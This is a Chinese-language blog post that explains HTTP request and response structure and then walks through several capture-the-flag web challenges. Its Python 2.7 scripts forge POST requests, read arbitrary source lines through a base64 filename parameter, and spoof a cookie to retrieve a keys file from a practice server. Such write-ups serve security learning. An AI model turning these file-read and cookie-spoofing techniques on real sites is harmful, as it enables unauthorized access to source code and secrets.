web安全 模擬Http請求

其實一直想出一篇文章詳解Http請求的,但是本人現在沒有把握寫的通俗易懂,但Http請求對于web至為重要,所以請萌新們不要浮躁,耐心看完Woo__dalao寫的Http請求。
鄭重聲明:以下圖片和文字來自一篇文章帶你詳解 HTTP 協議一文

Http協議概述
HTTP協議(HyperText Transfer Protocol,超文本傳輸協議)是用于從WWW服務器傳輸超文本到本地瀏覽器的傳輸協議。它可以使瀏覽器更加高效,使網絡傳輸減少。它不僅保證計算機正確快速地傳輸超文本文檔,還確定傳輸文檔中的哪一部分,以及哪部分內容首先顯示(如文本先于圖形)等。

HTTP 工作過程

response.jpg
  • 建立 TCP 連接
    在HTTP工作開始之前,客戶端首先要通過網絡與服務器建立連接,該連接是通過 TCP 來完成的,該協議與 IP 協議共同構建 Internet,即著名的 TCP/IP 協議族,因此 Internet 又被稱作是 TCP/IP 網絡。HTTP 是比 TCP 更高層次的應用層協議,根據規則,只有低層協議建立之后,才能進行高層協議的連接,因此,首先要建立 TCP 連接,一般 TCP 連接的端口號是80;
  • 客戶端向服務器發送請求命令
    一旦建立了TCP連接,客戶端就會向服務器發送請求命令;
    例如:GET/sample/hello.jsp HTTP/1.1
  • 客戶端發送請求頭信息
    客戶端發送其請求命令之后,還要以頭信息的形式向服務器發送一些別的信息,之后客戶端發送了一空白行來通知服務器,它已經結束了該頭信息的發送;
  • 服務器應答
    客戶端向服務器發出請求后,服務器會客戶端返回響應;
    例如: HTTP/1.1 200 OK
    響應的第一部分是協議的版本號和響應狀態碼
  • 服務器返回響應頭信息
    正如客戶端會隨同請求發送關于自身的信息一樣,服務器也會隨同響應向用戶發送關于它自己的數據及被請求的文檔;
  • 服務器向客戶端發送數據
    服務器向客戶端發送頭信息后,它會發送一個空白行來表示頭信息的發送到此為結束,接著,它就以 Content-Type 響應頭信息所描述的格式發送用戶所請求的實際數據;
  • 服務器關閉 TCP 連接
    一般情況下,一旦服務器向客戶端返回了請求數據,它就要關閉 TCP 連接,然后如果客戶端或者服務器在其頭信息加入了這行代碼 Connection:keep-alive ,TCP 連接在發送后將仍然保持打開狀態,于是,客戶端可以繼續通過相同的連接發送請求。保持連接節省了為每個請求建立新連接所需的時間,還節約了網絡帶寬。

對于Http報文客戶端向服務器發送請求命令部分,讓我們用一個簡單的例子解析HTTP 協議報文結構

ps:這里推薦chorme瀏覽器的postman插件用來模擬http請求哦~

請求報文 POST /form/entry HTTP/1.1

request.png

響應報文 HTTP/1.1 200 OK

response.png

應用場景:在alert框中尋找flag
postman設置為Get請求,截獲報文請求主體

NoEncode.jpg

咋一看最后一行長得像flag,我們抽一行看看轉換編碼試試,
咦~flag竟然躺在這里

選擇unicode轉ASCALL

flag.jpg

應用場景 偽造post請求

Test1:在x-www-form-urlencoded中填入
查找到的margin值
Result1:回顯更新,有戲

return.jpg

查看分配給瀏覽器的headers,flag躺在這里

result.jpg

Test2:提交題目發現不正確,多次post報文段發現
flag -> 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzog固定不變,但隨后的字符串是隨機生成的.應該是base64格式加密過了flag
Result2:

base64.jpg

Test3:根據上述還是不行,根源在于字符串是隨機生成的,所以flag也是隨機的,基于python2.7模擬Http請求
post.py

import requests
import base64

url = 'http://120.24.86.145:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']

txt = base64.b64decode(flag)
txt = txt[txt.index(":"):]
#找到:的前一個位置,從之后索引間隔一個位置向后掃描
txt = base64.b64decode(txt)

data = {'margin': txt}
ans = req.post(url,data)
print(ans.content)

Result3:拿到flag

finalkey.jpg

應用場景 Cookies欺騙

Test1:通過postman解析請求報文,使用base64解密,filename=keys.txt
觀察到URL下存在index.php,修改filename=index.php,未回顯。修改line字段同上

Result1

filename.jpg

Test2:基于python2.7,限定line參數范圍為40個,獲取index.php

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
for line in range(0, 40):
    url = url1 + str(line) + url2 + filename
    print req.get(url).content

Result2 index.php要求filename=keys.php,且要驗證cookies中的margin參數值為margin

D:\python27\python.exe F:/pythonProject/TestRun/Test.py 
<?php

  error_reporting(0);

  $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

  $line=isset($_GET['line'])?intval($_GET['line']):0;

  if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

  $file_list = array(  '0' =>'keys.txt', '1' =>'index.php', );

  if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
  $file_list[2]='keys.php';

  }


  if(in_array($file, $file_list)){

  $fa = file($file);

  echo $fa[$line];

  }

?>

Test3:驗證Cookies中的margin以及filename參數

import requests
import base64

url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='

filename = base64.b64encode("index.php")
req = requests.session()
# for line in range(0, 40):
#     url = url1 + str(line) + url2 + filename
#     print req.get(url).content

filename = base64.b64encode("keys.php")
url = url1 + str(0) + url2 + filename
print req.get(url, cookies={'margin': 'margin'}).content

Result3:返回含有flag的php腳本

D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php $key='KEY{key_keys}'; ?>

Process finished with exit code 0

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容